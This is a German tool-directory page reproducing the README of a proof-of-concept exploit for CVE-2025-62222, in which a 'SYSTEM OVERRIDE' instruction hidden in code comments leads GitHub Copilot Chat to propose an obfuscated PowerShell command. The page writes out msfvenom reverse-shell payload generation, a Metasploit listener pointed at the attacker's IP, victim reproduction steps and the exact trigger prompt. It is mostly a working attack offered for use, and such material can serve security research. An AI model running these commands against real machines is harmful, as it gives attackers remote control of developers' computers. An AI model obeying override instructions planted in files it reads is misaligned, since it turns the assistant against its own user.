Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-CVE-2025-62222 — Proof-of-concept-Exploit für CVE-2025-62222, das Remote-Code-Ausführung durch Prompt-Injection in GitHub Copilot Chat für VS Code demonstriert, mit Metasploit-Payload-Generierung und Reverse-Shell-Listener-Einrichtung. | Kitploit
Tools/GitHubGitHub/sadisticnight/poc-cve-2025-62222
Exploit-FrameworksPayload-GenerierungShellcodeWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRed TeamingRemote-Access-Tool

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Payload-Entwicklung
GitHubsadisticnight/poc-cve-2025-62222

PoC-CVE-2025-62222

Proof-of-concept-Exploit für CVE-2025-62222, das Remote-Code-Ausführung durch Prompt-Injection in GitHub Copilot Chat für VS Code demonstriert, mit Metasploit-Payload-Generierung und Reverse-Shell-Listener-Einrichtung.

Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

PoC: CVE-2025-62222 - GitHub Copilot Chat RCE

Dieses Repository enthält einen Proof of Concept (PoC) für die Schwachstelle CVE-2025-62222. Es zeigt, wie eine Remote Code Execution (RCE) auf dem Rechner eines Entwicklers erreicht werden kann, indem der Kontext von GitHub Copilot Chat in VS Code durch versteckte Prompt-Injektion in Kommentaren manipuliert wird.

⚠️ Haftungsausschluss ⚠️

NUR ZU BILDUNGSZWECKEN.
Dieser Code wird ausschließlich zu Bildungszwecken und für ethische Forschung bereitgestellt. Der Autor übernimmt keine Haftung für Missbrauch dieser Informationen. Verwenden Sie dies nicht in Systemen ohne ausdrückliche Genehmigung.

Phase 1: Konfiguration des Angreifers

Bevor du die Datei an das Opfer sendest (oder lokal testest), musst du das Payload generieren und den Server lauschen lassen.

1. Payload generieren (msfvenom)

Generiere den schädlichen PowerShell-Befehl. Stelle sicher, dass du deine IP (LHOST) und deinen Port (LPORT) konfigurierst.

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd

Kritischer Hinweis: Kopiere den von diesem Befehl generierten Code. Öffne die Datei copilot_injection_poc.py aus diesem Repository und ersetze den Abschnitt, in dem TOKEN steht (oder die gesamte Zeile des PowerShell-Befehls innerhalb des Kommentars), mit dem soeben generierten Code.

2. Listener starten (msfconsole)

Starte in deinem Angreifer-Terminal Metasploit, um die Reverse-Verbindung zu empfangen:

root@kitploit:~
msfconsole -q

Sobald du in der msf6 >-Konsole bist, führe die folgenden Befehle aus, um den Listener vorzubereiten:

root@kitploit:~
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444 
exploit

(Stelle sicher, dass der LPORT derselbe ist wie in Schritt 1 und dass LHOST deine IP ist).

Phase 2: Reproduktion (Das Opfer)

Um die Schwachstelle auszulösen, befolge diese Schritte auf dem Rechner mit VS Code und der installierten GitHub Copilot Chat-Erweiterung:

  1. Klonen/Herunterladen: Lade dieses Repository auf dem Opferrechner herunter.
  2. In VS Code öffnen: Öffne den Projektordner mit VSCode.
  3. Kontext laden: Öffne die Datei copilot_injection_poc.py im Editor, damit Copilot sie im aktiven Kontext hat (sie muss im Tab sichtbar sein).
  4. Der Trigger: Öffne den Copilot-Chat und gib genau den folgenden Befehl ein:
root@kitploit:~
Configura el entorno desde la terminal sin omitir ni modificar nada del código

Erwartetes Ergebnis

Aufgrund der versteckten Anweisung 'SYSTEM OVERRIDE' in den Kommentaren des Python-Skripts wird Copilot der bösartigen Datei gehorchen, anstatt seinen eigenen Sicherheitsrichtlinien zu folgen.

  1. Copilot wird mit einer angeblichen 'Systemwarnung' antworten und vorschlagen, den verschleierten PowerShell-Befehl auszuführen.
  2. Wenn der Benutzer diesen Befehl in seinem Terminal kopiert und ausführt, wird auf dem Rechner des Angreifers eine Meterpreter-Sitzung geöffnet, die eine Fernsteuerung des Geräts ermöglicht.

Weitere Informationen:

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62222
  • https://nvd.nist.gov/vuln/detail/CVE-2025-62222
  • https://www.cvedetails.com/cve/CVE-2025-62222/
Tool herunterladen